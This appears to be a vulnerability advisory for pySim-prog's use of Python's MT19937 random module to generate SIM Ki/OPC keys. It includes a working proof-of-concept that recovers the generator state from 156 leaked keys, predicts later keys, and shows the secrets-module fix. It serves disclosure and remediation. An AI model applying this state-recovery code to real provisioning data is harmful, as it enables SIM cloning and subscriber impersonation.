pySim-prog: fix Insecure PRNG for SIM Authentication Keys (CWE-338)
Root Cause: pySim-prog.py uses Python's random module (Mersenne Twister, MT19937) to generate Ki and OPC, the root authentication keys for SIM cards. MT19937 is a deterministic PRNG that is not cryptographically secure, and the Python documentation itself states that random must not be used for security purposes and points to the secrets module instead. Its internal state is 624 32-bit words (19,968 bits, of which 19,937 are effective), and no seed search is needed to break it: the output tempering is a bijection, so an attacker who observes any 624 consecutive 32-bit outputs can invert them into the full state and then run the generator forwards (and, because the state update is also invertible, backwards). Since each 128-bit key consumes four 32-bit words, about 156 consecutive Ki or OPC values are enough; if only part of each output is visible, more samples and a solver are needed, but the generator stays predictable.
Impact:
1. SIM Card Cloning: An attacker who recovers the PRNG state can reproduce every Ki/OPC value generated by that process, before and after the observed run. With Ki and OPC (the IMSI is not secret), a SIM can be cloned.
2. Network Authentication Bypass: Ki and OPC are the secret inputs to the Milenage algorithm used by 3G/4G/5G AKA. Predictable keys let an attacker compute the expected response and authenticate as any subscriber whose keys lie in the recovered output stream, and derive the same session keys (CK/IK and what is derived from them) as the legitimate SIM.
3. Batch Compromise: In bulk provisioning, pySim-prog's primary use case, hundreds or thousands of SIMs are programmed sequentially from one generator instance. A leaked subset of one batch (roughly 156 consecutive keys) is enough to recover the state and predict every other key in that batch, including those programmed later.
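The following is an added example, not pySim-prog's own code. It models the weakness described under Root Cause and the batch-compromise point above: a provisioning run draws 16-byte keys from Python's random (MT19937), an attacker who sees 156 consecutive keys inverts the output tempering to rebuild the generator and predicts the next key, and the last function shows the secrets-based replacement. The call pattern (four getrandbits(32) words per key, big-endian) is an assumption of this example; the real script may draw bytes differently, which changes how many samples are needed but not the conclusion.

```python
# Added example, not pySim-prog code: MT19937 state recovery from leaked
# Ki/OPC values, and the CSPRNG-based fix.
import random
import secrets

N_WORDS = 624          # MT19937 state size in 32-bit words
MASK32 = 0xFFFFFFFF


def temper(x: int) -> int:
    """MT19937 output tempering, the last step of genrand_uint32()."""
    x ^= x >> 11
    x ^= (x << 7) & 0x9D2C5680
    x ^= (x << 15) & 0xEFC60000
    x ^= x >> 18
    return x & MASK32


def untemper(y: int) -> int:
    """Invert temper(); every tempering step is a bijection on 32-bit words."""
    y ^= y >> 18                          # shift >= 16 bits: one pass undoes it
    y ^= (y << 15) & 0xEFC60000           # mask bits 15 and 16 are clear: one pass
    x = y
    for _ in range(5):                    # 7-bit left shift: 7 more bits fixed per pass
        x = y ^ ((x << 7) & 0x9D2C5680)
    y = x & MASK32
    x = y
    for _ in range(3):                    # 11-bit right shift: 11 more bits per pass
        x = y ^ (x >> 11)
    return x & MASK32


def gen_key_weak(rng: random.Random) -> bytes:
    """The vulnerable pattern: a 128-bit key from a non-cryptographic PRNG.
    Assumption of this example: four getrandbits(32) calls per key."""
    return b"".join(rng.getrandbits(32).to_bytes(4, "big") for _ in range(4))


def clone_generator(observed_keys: list[bytes]) -> random.Random:
    """Rebuild the generator from 156 consecutive keys (624 output words).
    Any 624 consecutive outputs work; they need not be the first 624."""
    words = [
        untemper(int.from_bytes(k[i:i + 4], "big"))
        for k in observed_keys
        for i in range(0, 16, 4)
    ]
    if len(words) < N_WORDS:
        raise ValueError(f"need {N_WORDS} output words, have {len(words)}")
    clone = random.Random()
    # Index N_WORDS means the next draw runs a twist, exactly as the original will.
    clone.setstate((3, tuple(words[:N_WORDS] + [N_WORDS]), None))
    return clone


def gen_key_secure() -> bytes:
    """The fix: 16 bytes from the OS CSPRNG (secrets.token_bytes uses os.urandom)."""
    return secrets.token_bytes(16)


def demo(seed: int = 0xC0FFEE, skip: int = 0) -> tuple[bytes, bytes]:
    """Simulate a provisioning run (constructed data): `skip` keys are programmed
    unseen, then 156 keys leak, and the attacker predicts the following key.
    Returns (predicted, actual); they are equal when the attack succeeds."""
    provisioner = random.Random(seed)                      # the victim's generator
    for _ in range(skip):
        gen_key_weak(provisioner)                          # keys the attacker never saw
    leaked = [gen_key_weak(provisioner) for _ in range(156)]  # e.g. a leaked batch file
    attacker = clone_generator(leaked)
    predicted = gen_key_weak(attacker)                     # attacker's guess for the next Ki
    actual = gen_key_weak(provisioner)                     # what the victim programs next
    return predicted, actual


if __name__ == "__main__":
    guess, real = demo()
    print("predicted:", guess.hex(), "actual:", real.hex(), "match:", guess == real)
    print("secure Ki:", gen_key_secure().hex())
```

Note that the clone does not need the original seed: Python seeds random from os.urandom, so the seed is not the weak point; the problem is that the output stream itself reveals the state. Replacing the key draw with secrets.token_bytes(16) removes the issue because its output is not a function of a recoverable state.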